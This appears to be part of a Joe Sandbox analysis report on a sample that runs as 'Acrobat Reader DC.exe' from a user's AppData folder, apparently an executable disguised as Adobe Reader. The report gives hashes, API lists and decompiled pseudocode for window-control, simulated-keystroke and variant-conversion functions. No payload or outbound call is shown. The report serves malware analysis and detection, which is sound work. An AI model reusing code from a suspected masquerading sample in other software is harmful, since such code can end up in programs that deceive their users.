                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: HandleLoadModuleString$Message_wprintf
                                  • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 3648134473-4247470361
                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E00441165(void* __edi, void* __esi, int _a4, intOrPtr _a8) {
				signed int _t23;
				int _t32;
				intOrPtr _t33;
				void* _t36;
				struct HWND__* _t37;
				void* _t41;
				struct HWND__** _t42;

				_t41 = __esi;
				_t36 = __edi;
				_t22 = _a8;
				_t32 = _a4;
				if(_a8 == 0) {
					_t23 =  *0x4a869c; // 0xffffffff
				} else {
					_t23 = E00430C09(_t22, 0x4a8630, _t22);
					 *0x4a869c = _t23;
				}
				if(_t23 != 0xffffffff) {
					_t33 =  *0x4a8690; // 0x0
					_push(_t41);
					_t42 =  *( *(_t33 + _t23 * 4));
					_push(_t36);
					_t37 =  *_t42;
					if(_t42[0xe] != 0) {
						_t42[0xe] = 0;
						if(_t42[0x64] >= 0 && _t42[0x67] != 0) {
							E00440A0D(0x4a8630, _t42, _t42[0x66]);
							_t42[0x67] = 0;
						}
					}
					if(_t32 > 0x43) {
						L24:
						return 1;
					} else {
						switch( *((intOrPtr*)(( *(_t32 + 0x44131d) & 0x000000ff) * 4 +  &M004412F5))) {
							case 0:
								__eax = ShowWindow(__edi, 0);
								_pop(__edi);
								__esi[0xe] = 0;
								_pop(__esi);
								__eax = 1;
								return 1;
								goto L28;
							case 1:
								if(__esi[0xe] != 0) {
									goto L19;
								} else {
									__eax = ShowWindow(__edi, __ebx);
									if(__ebx != 8 && __ebx != 4) {
										__eax = E00434418(__edi);
									}
									_pop(__edi);
									__esi[0xe] = 1;
									_pop(__esi);
									__eax = 1;
									return 1;
								}
								goto L28;
							case 2:
								__esi[0xe] = 1;
								goto L17;
							case 3:
								if(_t42[0xe] == 0) {
									goto L19;
								} else {
									ShowWindow(_t37, _t32);
									E00434418(_t37);
									return 1;
								}
								goto L28;
							case 4:
								L17:
								if(__esi[0xe] == 0) {
									L19:
									return 0;
								} else {
									__eax = ShowWindow(__edi, 6);
									_pop(__edi);
									_pop(__esi);
									__eax = 1;
									return 1;
								}
								goto L28;
							case 5:
								__eax = EnableWindow(__edi, 1);
								_pop(__edi);
								_pop(__esi);
								__eax = 1;
								return 1;
								goto L28;
							case 6:
								__eax = EnableWindow(__edi, 0);
								_pop(__edi);
								_pop(__esi);
								__eax = 1;
								return 1;
								goto L28;
							case 7:
								__esi[0xe] = 1;
								__eax = LockWindowUpdate(__edi);
								_pop(__edi);
								_pop(__esi);
								__eax = 1;
								return 1;
								goto L28;
							case 8:
								__esi[0xe] = 0;
								LockWindowUpdate(0) = InvalidateRect( *__esi, 0, 1);
								goto L24;
							case 9:
								goto L24;
						}
					}
				} else {
					return 0;
				}
				L28:
			}










                                  0x00441165
                                  0x00441165
                                  0x00441168
                                  0x0044116c
                                  0x00441171
                                  0x004412e0
                                  0x00441177
                                  0x0044117d
                                  0x00441182
                                  0x00441182
                                  0x004412e8
                                  0x0044118c
                                  0x00441195
                                  0x00441196
                                  0x0044119c
                                  0x0044119d
                                  0x0044119f
                                  0x004411a8
                                  0x004411ac
                                  0x004411c4
                                  0x004411c9
                                  0x004411c9
                                  0x004411ac
                                  0x004411d3
                                  0x004412d4
                                  0x004412dd
                                  0x004411d9
                                  0x004411e0
                                  0x00000000
                                  0x0044123c
                                  0x00441242
                                  0x00441243
                                  0x00441247
                                  0x00441248
                                  0x0044124f
                                  0x00000000
                                  0x00000000
                                  0x0044120f
                                  0x00000000
                                  0x00441211
                                  0x00441213
                                  0x0044121c
                                  0x00441224
                                  0x00441224
                                  0x00441229
                                  0x0044122a
                                  0x0044122e
                                  0x0044122f
                                  0x00441236
                                  0x00441236
                                  0x00000000
                                  0x00000000
                                  0x00441252
                                  0x00000000
                                  0x00000000
                                  0x004411eb
                                  0x00000000
                                  0x004411f1
                                  0x004411f3
                                  0x004411fa
                                  0x00441208
                                  0x00441208
                                  0x00000000
                                  0x00000000
                                  0x00441256
                                  0x0044125a
                                  0x00441271
                                  0x00441277
                                  0x0044125c
                                  0x0044125f
                                  0x00441265
                                  0x00441266
                                  0x00441267
                                  0x0044126e
                                  0x0044126e
                                  0x00000000
                                  0x00000000
                                  0x00441292
                                  0x00441298
                                  0x00441299
                                  0x0044129a
                                  0x004412a1
                                  0x00000000
                                  0x00000000
                                  0x0044127d
                                  0x00441283
                                  0x00441284
                                  0x00441285
                                  0x0044128c
                                  0x00000000
                                  0x00000000
                                  0x004412a5
                                  0x004412a9
                                  0x004412af
                                  0x004412b0
                                  0x004412b1
                                  0x004412b8
                                  0x00000000
                                  0x00000000
                                  0x004412bd
                                  0x004412ce
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004411e0
                                  0x004412ee
                                  0x004412f2
                                  0x004412f2
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00445E52 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 81%
                                  			E00445E52(struct HWND__** _a4, intOrPtr _a8) {
				struct HWND__** _t27;

				_t27 = _a4;
				E00445AA7( *_t27, 1);
				_push(MapVirtualKeyW(0x25, 0) << 0x00000010 | 0x00000001);
				if(_a8 >= 0) {
					PostMessageW( *_t27, 0x100, 0x27, ??);
					Sleep(0);
					PostMessageW( *_t27, 0x101, 0x27, MapVirtualKeyW(0x25, 0) << 0x00000010 | 0xc0000001);
				} else {
					PostMessageW( *_t27, 0x100, 0x25, ??);
					Sleep(0);
					PostMessageW( *_t27, 0x101, 0x25, MapVirtualKeyW(0x25, 0) << 0x00000010 | 0xc0000001);
				}
				Sleep(0);
				E00445AA7( *_t27, 0);
				return 1;
			}




                                  0x00445e57
                                  0x00445e60
                                  0x00445e7b
                                  0x00445e7c
                                  0x00445ebd
                                  0x00445ecb
                                  0x00445ee6
                                  0x00445e7e
                                  0x00445e88
                                  0x00445e96
                                  0x00445ee6
                                  0x00445ee6
                                  0x00445eee
                                  0x00445ef5
                                  0x00445f00

                                  APIs
                                    • Part of subcall function 00445AA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00445AC7
                                    • Part of subcall function 00445AA7: GetCurrentThreadId.KERNEL32 ref: 00445ACE
                                    • Part of subcall function 00445AA7: AttachThreadInput.USER32(00000000), ref: 00445AD5
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E6F
                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445E88
                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445E96
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445E9C
                                  • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445EBD
                                  • Sleep.KERNEL32(00000000), ref: 00445ECB
                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445ED1
                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445EE6
                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445EEE
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                  • String ID:
                                  • API String ID: 2014098862-0
                                  • Opcode ID: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                  • Instruction ID: 3cb45b36699f005c3339592b7719367c9fd6f04972b18b3a4454280c1561912d
                                  • Opcode Fuzzy Hash: 5ca03ddf5c5627d7609a553b695717aade5f72ce3845e2189486292beca2fa90
                                  • Instruction Fuzzy Hash: 44115671390300BBF6209B959D8AF5A775DEB98B11F20490DFB80AB1C1C5F5A4418B7C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ClearVariant
                                  • String ID:
                                  • API String ID: 1473721057-0
                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 56%
                                  			E0045EA0F(intOrPtr* _a4, signed int _a8) {
				signed int _v8;
				signed short _v12;
				signed short _v20;
				signed int _v24;
				signed int _v26;
				signed int _v28;
				signed int _v30;
				signed short _v34;
				signed int _v36;
				signed int _v40;
				signed short _v44;
				signed int _v48;
				signed int _v52;
				char _v84;
				signed int _t104;
				signed int _t105;
				intOrPtr* _t120;
				intOrPtr _t129;
				signed short* _t130;
				signed int _t131;
				void* _t137;

				_t120 = _a4;
				_t130 = _a8;
				_t104 =  *_t130 & 0x0000ffff;
				_t137 = _t104 - 0x4002;
				if(_t137 > 0) {
					_t105 = _t104 - 0x4003;
					if(_t105 > 0x12) {
						goto L55;
					} else {
						switch( *((intOrPtr*)(_t105 * 4 +  &M0045EEBB))) {
							case 0:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi != 0) {
									__edi =  *__esi;
									goto L8;
								}
								goto L9;
							case 1:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__fp0 =  *__esi;
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									 *__ebx = _v12;
									return __eax;
								}
								goto L56;
							case 2:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__fp0 =  *__esi;
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									 *__ebx = _v12;
									return __eax;
								}
								goto L56;
							case 3:
								goto L55;
							case 4:
								goto L20;
							case 5:
								__eflags = _t130[4];
								if(__eflags != 0) {
									_push(0x10);
									 *((intOrPtr*)(_t120 + 8)) = 8;
									_t108 = E004115D7(_t128, _t130, __eflags);
									_push(_t108);
									 *_t120 = _t108;
									__imp__#8();
									 *((short*)( *_t120)) = 9;
									 *((intOrPtr*)( *_t120 + 8)) =  *(_t130[4]);
									_t111 =  *((intOrPtr*)( *_t120 + 8));
									_push(_t111);
									 *((intOrPtr*)( *((intOrPtr*)( *_t111 + 4))))();
								}
								return 1;
								goto L56;
							case 6:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__eflags =  *__esi;
									_t100 =  *__esi != 0;
									__eflags = _t100;
									__edx = __edx & 0xffffff00 | _t100;
									_a8 = __dl;
									__eax = _a8;
									return E004530C9(__ebx, _a8);
								}
								goto L56;
							case 7:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__ecx = __ebx;
									return E00468070(__ebx, __esi);
								}
								goto L56;
							case 8:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi != 0) {
									__edi =  *__esi;
									goto L8;
								}
								goto L9;
							case 9:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi != 0) {
									__edi =  *__esi & 0x000000ff;
									goto L8;
								}
								goto L9;
							case 0xa:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi != 0) {
									__edi =  *__esi & 0x0000ffff;
									goto L8;
								}
								goto L9;
							case 0xb:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__ecx =  *(__esi + 4);
									__edi =  *__esi;
									__esi = __ebx;
									_v8 = __ecx;
									__eax = E00408F40(__edi, __ebx);
									__edx = _v8;
									 *((intOrPtr*)(__ebx + 8)) = 2;
									 *(__ebx + 4) = _v8;
									 *__ebx = __edi;
									return __eax;
								}
								goto L56;
							case 0xc:
								__esi =  *(__esi + 8);
								__eflags = __esi;
								if(__esi == 0) {
									goto L9;
								} else {
									__edi =  *__esi;
									__eax =  *(__esi + 4);
									goto L15;
								}
								goto L56;
						}
					}
				} else {
					if(_t137 == 0) {
						_t131 = _t130[4];
						if(_t131 != 0) {
							_t129 =  *_t131;
							goto L8;
						}
						goto L9;
					} else {
						if(_t104 > 0x15) {
							L55:
							return 0;
						} else {
							switch( *((intOrPtr*)(_t104 * 4 +  &M0045EE63))) {
								case 0:
									__eax = 0x484ea8;
									return E0040E710(0x484ea8, __ebx, __ecx);
									goto L56;
								case 1:
									__edi =  *(__esi + 8);
									goto L8;
								case 2:
									__edi =  *(__esi + 8);
									goto L8;
								case 3:
									__fp0 =  *(__esi + 8);
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									 *__ebx = _v12;
									return __eax;
									goto L56;
								case 4:
									__fp0 =  *(__esi + 8);
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									 *__ebx = _v12;
									return __eax;
									goto L56;
								case 5:
									asm("fild qword [esi+0x8]");
									__esi = __ebx;
									_v12 = __fp0;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *__ebx = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									return __eax;
									goto L56;
								case 6:
									__fp0 =  *(__esi + 8);
									__eax =  &_v36;
									_push( &_v36);
									__esp = __esp - 8;
									 *__esp =  *(__esi + 8);
									__imp__#185();
									__ecx = _v24 & 0x0000ffff;
									__edx = _v26 & 0x0000ffff;
									__eax = _v28 & 0x0000ffff;
									_push(_v24 & 0x0000ffff);
									__ecx = _v30 & 0x0000ffff;
									_push(_v26 & 0x0000ffff);
									__edx = _v34 & 0x0000ffff;
									_push(_v28 & 0x0000ffff);
									__eax = _v36 & 0x0000ffff;
									_push(_v30 & 0x0000ffff);
									_push(__edx);
									__ecx =  &_v84;
									__eax = E0041329B(__edx,  &_v84, L"%4d%02d%02d%02d%02d%02d", _v36 & 0x0000ffff);
									__eax =  &_v84;
									return E0040E710( &_v84, __ebx, __ecx);
									goto L56;
								case 7:
									L20:
									__eflags =  *(__esi + 8);
									if(__eflags == 0) {
										goto L9;
									} else {
										_push(0x10);
										__eax = E004115D7(__edi, __esi, __eflags);
										__esp =  &(__esp[2]);
										__eflags = __eax;
										if(__eflags == 0) {
											__eax = 0;
											__eflags = 0;
											 *(__ebx + 0xc) = 0;
											 *((intOrPtr*)(__ebx + 8)) = 4;
											return 0;
										} else {
											__edi =  *(__esi + 8);
											__esi = __eax;
											__eax = E00401B10(__edi, __eax, __eflags);
											 *(__ebx + 0xc) = __eax;
											 *((intOrPtr*)(__ebx + 8)) = 4;
											return __eax;
										}
									}
									goto L56;
								case 8:
									_push(0x10);
									 *((intOrPtr*)(_t120 + 8)) = 8;
									_t116 = E004115D7(_t128, _t130, _t138);
									_push(_t116);
									 *_t120 = _t116;
									__imp__#8();
									_t117 =  *_t120;
									_push(_t130);
									_push(_t117);
									__imp__#10();
									if(_t117 < 0) {
										_push( *_t120);
										__imp__#9();
										_push( *_t120);
										E004111DC();
										 *_t120 = 0;
									}
									return 1;
									goto L56;
								case 9:
									goto L55;
								case 0xa:
									__eflags =  *(__esi + 8);
									_t43 =  *(__esi + 8) != 0;
									__eflags = _t43;
									__ecx = __ecx & 0xffffff00 | _t43;
									_a8 = __cl;
									__edx = _a8;
									return E004530C9(__ebx, _a8);
									goto L56;
								case 0xb:
									__eax =  *(__esi + 4);
									__ecx =  *(__esi + 8);
									__edx =  *__esi;
									_v48 =  *(__esi + 4);
									__eax =  &_v20;
									_v44 =  *(__esi + 8);
									_v52 =  *__esi;
									__edx =  *(__esi + 0xc);
									_push( &_v20);
									__ecx =  &_v52;
									_push( &_v52);
									_v40 =  *(__esi + 0xc);
									__imp__#220();
									__fp0 = _v20;
									__esi = __ebx;
									_v12 = _v20;
									__eax = E00408F40(__edi, __ebx);
									__fp0 = _v12;
									 *__ebx = _v12;
									 *((intOrPtr*)(__ebx + 8)) = 3;
									return __eax;
									goto L56;
								case 0xc:
									__edi =  *(__esi + 8);
									goto L8;
								case 0xd:
									__edi =  *(__esi + 8) & 0x000000ff;
									goto L8;
								case 0xe:
									__edi =  *(__esi + 8) & 0x0000ffff;
									L8:
									E00408F40(_t129, _t120);
									 *((intOrPtr*)(_t120 + 8)) = 1;
									 *_t120 = _t129;
									L9:
									return 1;
									goto L56;
								case 0xf:
									__edi =  *(__esi + 8);
									__eax =  *(__esi + 0xc);
									L15:
									__esi = __ebx;
									_v8 = __eax;
									__eax = E00408F40(__edi, __ebx);
									__ecx = _v8;
									 *((intOrPtr*)(__ebx + 8)) = 2;
									 *(__ebx + 4) = _v8;
									 *__ebx = __edi;
									return __eax;
									goto L56;
								case 0x10:
									__edx =  *(__esi + 0xc);
									__edi =  *(__esi + 8);
									__esi = __ebx;
									_v8 = __edx;
									__eax = E00408F40(__edi, __ebx);
									__eax = _v8;
									 *(__ebx + 4) = __eax;
									 *((intOrPtr*)(__ebx + 8)) = 2;
									 *__ebx = __edi;
									return __eax;
									goto L56;
							}
						}
					}
				}
				L56:
			}
























                                  0x0045ea16
                                  0x0045ea1a
                                  0x0045ea1d
                                  0x0045ea21
                                  0x0045ea26
                                  0x0045ecbf
                                  0x0045ecc7
                                  0x00000000
                                  0x0045eccd
                                  0x0045eccd
                                  0x00000000
                                  0x0045ed59
                                  0x0045ed5c
                                  0x0045ed5e
                                  0x0045ed64
                                  0x00000000
                                  0x0045ed64
                                  0x00000000
                                  0x00000000
                                  0x0045edb4
                                  0x0045edb7
                                  0x0045edb9
                                  0x00000000
                                  0x0045edbf
                                  0x0045edbf
                                  0x0045edc1
                                  0x0045edc3
                                  0x0045edc6
                                  0x0045edcb
                                  0x0045edce
                                  0x0045edd5
                                  0x0045eddf
                                  0x0045eddf
                                  0x00000000
                                  0x00000000
                                  0x0045ede2
                                  0x0045ede5
                                  0x0045ede7
                                  0x00000000
                                  0x0045eded
                                  0x0045eded
                                  0x0045edef
                                  0x0045edf1
                                  0x0045edf4
                                  0x0045edf9
                                  0x0045edfc
                                  0x0045ee03
                                  0x0045ee0d
                                  0x0045ee0d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0045ecd4
                                  0x0045ecd8
                                  0x0045ecda
                                  0x0045ecdc
                                  0x0045ece3
                                  0x0045eceb
                                  0x0045ecec
                                  0x0045ecee
                                  0x0045ecfb
                                  0x0045ed05
                                  0x0045ed0a
                                  0x0045ed0f
                                  0x0045ed13
                                  0x0045ed13
                                  0x0045ed1d
                                  0x00000000
                                  0x00000000
                                  0x0045ee10
                                  0x0045ee13
                                  0x0045ee15
                                  0x00000000
                                  0x0045ee1b
                                  0x0045ee1b
                                  0x0045ee1f
                                  0x0045ee1f
                                  0x0045ee1f
                                  0x0045ee22
                                  0x0045ee25
                                  0x0045ee37
                                  0x0045ee37
                                  0x00000000
                                  0x00000000
                                  0x0045ee3a
                                  0x0045ee3d
                                  0x0045ee3f
                                  0x00000000
                                  0x0045ee45
                                  0x0045ee46
                                  0x0045ee55
                                  0x0045ee55
                                  0x00000000
                                  0x00000000
                                  0x0045ed20
                                  0x0045ed23
                                  0x0045ed25
                                  0x0045ed2b
                                  0x00000000
                                  0x0045ed2b
                                  0x00000000
                                  0x00000000
                                  0x0045ed33
                                  0x0045ed36
                                  0x0045ed38
                                  0x0045ed3e
                                  0x00000000
                                  0x0045ed3e
                                  0x00000000
                                  0x00000000
                                  0x0045ed46
                                  0x0045ed49
                                  0x0045ed4b
                                  0x0045ed51
                                  0x00000000
                                  0x0045ed51
                                  0x00000000
                                  0x00000000
                                  0x0045ed6b
                                  0x0045ed6e
                                  0x0045ed70
                                  0x00000000
                                  0x0045ed76
                                  0x0045ed76
                                  0x0045ed79
                                  0x0045ed7b
                                  0x0045ed7d
                                  0x0045ed80
                                  0x0045ed85
                                  0x0045ed88
                                  0x0045ed8f
                                  0x0045ed92
                                  0x0045ed9c
                                  0x0045ed9c
                                  0x00000000
                                  0x00000000
                                  0x0045ed9f
                                  0x0045eda2
                                  0x0045eda4
                                  0x00000000
                                  0x0045edaa
                                  0x0045edaa
                                  0x0045edac
                                  0x00000000
                                  0x0045edac
                                  0x00000000
                                  0x00000000
                                  0x0045eccd
                                  0x0045ea2c
                                  0x0045ea2c
                                  0x0045ecac
                                  0x0045ecb1
                                  0x0045ecb7
                                  0x00000000
                                  0x0045ecb7
                                  0x00000000
                                  0x0045ea32
                                  0x0045ea35
                                  0x0045ee5a
                                  0x0045ee60
                                  0x0045ea3b
                                  0x0045ea3b
                                  0x00000000
                                  0x0045ec97
                                  0x0045eca9
                                  0x00000000
                                  0x00000000
                                  0x0045eab4
                                  0x00000000
                                  0x00000000
                                  0x0045eac0
                                  0x00000000
                                  0x00000000
                                  0x0045eb19
                                  0x0045eb1c
                                  0x0045eb1e
                                  0x0045eb21
                                  0x0045eb26
                                  0x0045eb29
                                  0x0045eb30
                                  0x0045eb3a
                                  0x00000000
                                  0x00000000
                                  0x0045eb3d
                                  0x0045eb40
                                  0x0045eb42
                                  0x0045eb45
                                  0x0045eb4a
                                  0x0045eb4d
                                  0x0045eb54
                                  0x0045eb5e
                                  0x00000000
                                  0x00000000
                                  0x0045eb61
                                  0x0045eb64
                                  0x0045eb6c
                                  0x0045eb6f
                                  0x0045eb74
                                  0x0045eb77
                                  0x0045eb79
                                  0x0045eb88
                                  0x00000000
                                  0x00000000
                                  0x0045ebf9
                                  0x0045ebfc
                                  0x0045ebff
                                  0x0045ec00
                                  0x0045ec03
                                  0x0045ec06
                                  0x0045ec0c
                                  0x0045ec10
                                  0x0045ec14
                                  0x0045ec18
                                  0x0045ec19
                                  0x0045ec1d
                                  0x0045ec1e
                                  0x0045ec22
                                  0x0045ec23
                                  0x0045ec27
                                  0x0045ec28
                                  0x0045ec2a
                                  0x0045ec33
                                  0x0045ec3b
                                  0x0045ec4b
                                  0x00000000
                                  0x00000000
                                  0x0045eb8b
                                  0x0045eb8b
                                  0x0045eb8f
                                  0x00000000
                                  0x0045eb95
                                  0x0045eb95
                                  0x0045eb97
                                  0x0045eb9c
                                  0x0045eb9f
                                  0x0045eba1
                                  0x0045ebc2
                                  0x0045ebc2
                                  0x0045ebc4
                                  0x0045ebc7
                                  0x0045ebd6
                                  0x0045eba3
                                  0x0045eba3
                                  0x0045eba6
                                  0x0045eba8
                                  0x0045ebad
                                  0x0045ebb0
                                  0x0045ebbf
                                  0x0045ebbf
                                  0x0045eba1
                                  0x00000000
                                  0x00000000
                                  0x0045ea42
                                  0x0045ea44
                                  0x0045ea4b
                                  0x0045ea53
                                  0x0045ea54
                                  0x0045ea56
                                  0x0045ea5c
                                  0x0045ea5e
                                  0x0045ea5f
                                  0x0045ea60
                                  0x0045ea68
                                  0x0045ea6c
                                  0x0045ea6d
                                  0x0045ea75
                                  0x0045ea76
                                  0x0045ea7e
                                  0x0045ea7e
                                  0x0045ea8c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0045ebd9
                                  0x0045ebde
                                  0x0045ebde
                                  0x0045ebde
                                  0x0045ebe1
                                  0x0045ebe4
                                  0x0045ebf6
                                  0x00000000
                                  0x00000000
                                  0x0045ec4e
                                  0x0045ec51
                                  0x0045ec54
                                  0x0045ec56
                                  0x0045ec59
                                  0x0045ec5c
                                  0x0045ec5f
                                  0x0045ec62
                                  0x0045ec65
                                  0x0045ec66
                                  0x0045ec69
                                  0x0045ec6a
                                  0x0045ec6d
                                  0x0045ec73
                                  0x0045ec76
                                  0x0045ec78
                                  0x0045ec7b
                                  0x0045ec80
                                  0x0045ec83
                                  0x0045ec85
                                  0x0045ec94
                                  0x00000000
                                  0x00000000
                                  0x0045ea8f
                                  0x00000000
                                  0x00000000
                                  0x0045eaae
                                  0x00000000
                                  0x00000000
                                  0x0045eaba
                                  0x0045ea93
                                  0x0045ea95
                                  0x0045ea9a
                                  0x0045eaa1
